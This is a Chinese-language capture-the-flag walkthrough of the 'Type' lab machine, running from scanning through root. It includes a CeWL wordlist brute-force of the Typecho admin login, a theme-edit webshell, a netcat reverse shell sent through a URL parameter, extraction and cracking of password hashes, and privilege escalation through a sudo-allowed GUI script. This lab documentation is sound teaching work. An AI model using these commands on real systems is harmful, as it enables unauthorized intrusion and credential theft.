Mazesec_Type

靶机说明

• 靶机复盘：Mazesec-Type
• QQ群：660930334
• 难度：Medium

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:32 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00066s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00056s latency).
MAC Address: 08:00:27:92:0B:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.75
Host is up (0.00094s latency).
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.47 seconds

靶机IP：192.168.2.75

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.75
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:37 +0800
Nmap scan report for 192.168.2.75
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 43.02 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.75 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:38 +0800
Nmap scan report for 192.168.2.75
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp open  http    nginx
|_http-generator: Typecho 1.3.0
|_http-title: type.dsz
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.75                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-25 15:38 +0800
Nmap scan report for 192.168.2.75
Host is up (0.00085s latency).
All 100 scanned ports on 192.168.2.75 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:1E:9E:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.49 seconds

二、WEB渗透

1、80端口

访问80端口，找到一个域名type.dsz，追加至hosts文件

2、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# dirsearch -u http://type.dsz    
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/miaosec/reports/http_type.dsz/_26-02-25_15-46-04.txt

Target: http://type.dsz/

....
[15:46:20] 301 -  162B  - /admin  ->  http://type.dsz/admin/
[15:46:21] 302 -    0B  - /admin/  ->  http://type.dsz/admin/login.php?referer=http%3A%2F%2Ftype.dsz%2Fadmin%2F
[15:46:21] 302 -    0B  - /admin/index.php  ->  http://type.dsz/admin/login.php?referer=http%3A%2F%2Ftype.dsz%2Fadmin%2Findex.php
[15:46:21] 200 -    5KB - /admin/login.php
[15:46:38] 200 -    0B  - /config.inc.php
[15:46:45] 301 -    0B  - /feed  ->  http://type.dsz/index.php/feed/
[15:46:51] 301 -  162B  - /install  ->  http://type.dsz/install/
[15:46:51] 302 -    0B  - /install.php  ->  http://type.dsz/
[15:46:51] 302 -    0B  - /install.php?profile=default  ->  http://type.dsz/
[15:46:51] 403 -  548B  - /install/
[15:46:53] 200 -   15KB - /LICENSE.txt
[15:47:23] 301 -  162B  - /usr  ->  http://type.dsz/usr/
[15:47:23] 403 -  548B  - /usr/
[15:47:23] 403 -  548B  - /var/
[15:47:23] 301 -  162B  - /var  ->  http://type.dsz/var/

Task Completed

访问/admind/login.php，需要账号和密码

3、信息泄露

在页面提示我们需要cewl

• Tip CeWL –自定义词表生成器,是一个 ruby 程序，可将特定 URL 爬取到定义的深度并返回关键字列表，密码破解者如John the Ripper、Medusa和 WFuzz 可以使用这些关键字来破解密码。Cewl 还有一个相关的命令行应用程序 FAB，它使用相同的元数据提取技术，使用 CeWL 等信息提取算法从已下载的文件中生成作者/制作者列表。

爬取字典

┌──(root㉿kali)-[~/miaosec]
└─# cewl http://type.dsz -w dict.txt          
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

使用这个字典进行爆破，最后成功获取到账号和密码：sburro:DevNotes

同时在草稿里面找到一串字符串，怀疑是admin用户的密码

使用凭证：admin:2DbYCYpXwvV9kKwO成功进行登录

三、获取shell

修改外观的主题

成功反弹shell

http://192.168.2.75/index.php?pass=busybox%20nc%20192.168.2.4%204444%20-e%20/bin/sh
┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.75] 41077
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

稳定shell

/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取plugugly权限

查看config.inc.php

cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));

// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');

// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');

// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');

// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';

// init
\Typecho\Common::init();

// config db
$db = new \Typecho\Db('Pdo_SQLite', 'typecho_');
$db->addServer(array (
  'file' => '/data/database/typecho.db',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);

找到数据库的文件/data/database/typecho.db

提取到本地，查看数据库

┌──(root㉿kali)-[/tmp]
└─# sqlite3 typecho.db               
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .show
        echo: off
         eqp: off
     explain: auto
     headers: off
        mode: list
   nullvalue: ""
      output: stdout
colseparator: "|"
rowseparator: "\n"
       stats: off
       width: 
    filename: typecho.db
sqlite> .tables
typecho_comments       typecho_metas          typecho_users        
typecho_contents       typecho_options      
typecho_fields         typecho_relationships
sqlite> select * from typecho_users;
1|admin|$P$B/xZAkZ342fLS1sEQwQfsXTVKiBnVG/|admin@type.dsz|http://type.dsz/|admin|1771773701|1772094602|1771815254|administrator|64f0e6e34396f985205ac19ef1c71e23
2|sburro|$P$BfS2sY4Vz6sHjC52095jVAFOjMNyuy1|sburro@type.dsz||sburro|1771774529|1774257141|1772093510|contributor|5884754808cdbe5ad69eeaa4e42c3f18
3|plugugly|$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/|plugugly@type.dsz||plugugly|1771812079|0|0|subscriber|

使用john破解hash值$P$BuyKfLj9xZ0iLez6SomJNOLGx.7g.U/

┌──(root㉿kali)-[/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2boobies         (?)     
1g 0:00:00:04 DONE (2026-03-23 17:26) 0.2109g/s 20901p/s 20901c/s 20901C/s Dominic1..10031985
Use the "--show --format=phpass" options to display all of the cracked passwords reliably

成功获取到密码，得到权限

┌──(root㉿kali)-[/tmp]
└─# ssh plugugly@192.168.2.75  
Type:~$ id
uid=1000(plugugly) gid=1000(plugugly) groups=1000(plugugly)

2、获取root权限

查看sudo -l

Type:~$ sudo -l
Matching Defaults entries for plugugly on Type:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XAUTHORITY

Runas and Command-specific defaults for plugugly:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User plugugly may run the following commands on Type:
    (ALL) NOPASSWD: /root/typer.py

执行一下看看

Type:~$ sudo /root/typer.py -h
qt.qpa.xcb: could not connect to display 
qt.qpa.plugin: From 6.5.0, xcb-cursor0 or libxcb-cursor0 is needed to load the Qt xcb platform plugin.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: linuxfb, vkkhrdisplay, minimal, wayland-egl, minimalegl, xcb, vnc, offscreen, wayland, eglfs.

Aborted

提示缺少图形界面

那使用ssh进行转发

┌──(root㉿kali)-[~]
└─# ssh -X plugugly@192.168.2.75 
plugugly@192.168.2.75's password: 
              _                          
__      _____| | ___ ___  _ __ ___   ___ 
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
 \ V  V /  __/ | (_| (_) | | | | | |  __/
  \_/\_/ \___|_|\___\___/|_| |_| |_|\___|
                                         
/usr/bin/xauth:  file /home/plugugly/.Xauthority does not exist
Type:~$ ls -la
total 20
drwxr-sr-x    2 plugugly plugugly      4096 Mar 23 17:34 .
drwxr-xr-x    3 root     root          4096 Feb 22 23:25 ..
-rw-------    1 plugugly plugugly        50 Mar 23 17:34 .Xauthority
lrwxrwxrwx    1 root     plugugly         9 Feb 23 10:43 .ash_history -> /dev/null
-rw-r--r--    1 root     plugugly       111 Feb 23 10:42 .hint
-rw-r--r--    1 root     plugugly        44 Feb 22 23:25 user.txt
Type:~$ cat .X
cat: can't open '.X': No such file or directory
Type:~$ cat .Xauthority 
Type10MIT-MAGIC-COOKIE-1��j}�A��c��
                                   ��>%Type:~$ 
Type:~$ sudo DISPLAY=$DISPLAY XAUTHORITY=/home/plugugly/.Xauthority /root/typer.py

成功执行脚本，获取到root权限

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.75] 37745
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

五、查看FLAG

cat /root/root.txt /home/plugugly/user.txt
flag{root-e0d46f8ca8c65edb6b7d46daeafebe16}
flag{user-f1315ee82308853cc1a9402f2cfa6d1c}